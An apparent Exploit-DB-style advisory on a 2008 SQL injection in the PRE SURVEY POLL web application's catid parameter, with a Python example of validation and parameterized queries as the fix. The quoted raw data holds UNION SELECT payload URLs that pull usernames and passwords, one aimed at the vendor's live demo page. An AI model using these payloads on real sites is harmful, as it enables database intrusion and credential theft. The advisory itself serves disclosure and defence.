vendor: PRE SURVEY POLL
by: DreamTurk / sqL Lov3r'Z Crew Co.
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: PRE SURVEY POLL
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PRE SURVEY POLL Remote Sql Injection

PRE SURVEY POLL is vulnerable to SQL injection through the catid parameter of default.asp, as the requests in the raw data below show. An attacker can use this vulnerability to inject SQL commands and gain access to sensitive information stored in the database, such as usernames and passwords. The attacker can also use this vulnerability to modify or delete data in the database.

Mitigation:

Input validation and parameterized queries can be used to prevent SQL injection attacks.
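
The two mitigations named above, as an added example that is not part of the original advisory or the vendor's code. It uses Python with sqlite3 (the product itself is ASP); the schema, sample rows and function names are constructed for illustration, and the catid value is the one from the raw data below.

```python
import sqlite3

# catid value from the advisory's request, URL-decoded ('+' becomes a space).
PAYLOAD = "1 union select 0,username from users"

def make_db():
    """Constructed sample schema; the product's real tables are not on the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE polls (catid INTEGER, question TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO polls VALUES (1, 'Favourite colour?');
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db

def polls_vulnerable(db, raw_catid):
    # 'Before': the request value is concatenated into the SQL text,
    # so a UNION clause inside catid becomes part of the statement.
    sql = "SELECT catid, question FROM polls WHERE catid = " + raw_catid
    return db.execute(sql).fetchall()

def parse_catid(raw):
    # Input validation: accept only a short run of ASCII digits.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("catid must be a non-negative integer")
    return int(raw)

def polls_bound_only(db, raw_catid):
    # Parameterization alone: the value is bound as data and never parsed
    # as SQL, so the UNION text simply matches no category.
    sql = "SELECT catid, question FROM polls WHERE catid = ?"
    return db.execute(sql, (raw_catid,)).fetchall()

def polls_hardened(db, raw_catid):
    # Both mitigations: validate first, then bind the integer.
    sql = "SELECT catid, question FROM polls WHERE catid = ?"
    return db.execute(sql, (parse_catid(raw_catid),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", polls_vulnerable(db, PAYLOAD))
    print("bound only:  ", polls_bound_only(db, PAYLOAD))
    try:
        polls_hardened(db, PAYLOAD)
    except ValueError as err:
        print("validated:    rejected,", err)
```

In the ASP application the equivalent change is to convert catid to an integer and pass it as a bound command parameter instead of building the query string by concatenation.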

Exploit-DB raw data:

PRE SURVEY POLL Remote Sql Injection
DreamTurk / sqL Lov3r'Z Crew Co. 2008
Download: http://www.preproject.com/poll.asp / Price $28.00
Demo : http://www.preproject.com/poll/default.asp
Sql :
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users

Admin Panel :
http://localhost/patch/admin/default.asp
Greatz : aLL My Friend'Z and str0ke

========================================From Turkey=============================================
Demo Page ;
 http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

# milw0rm.com [2008-07-22]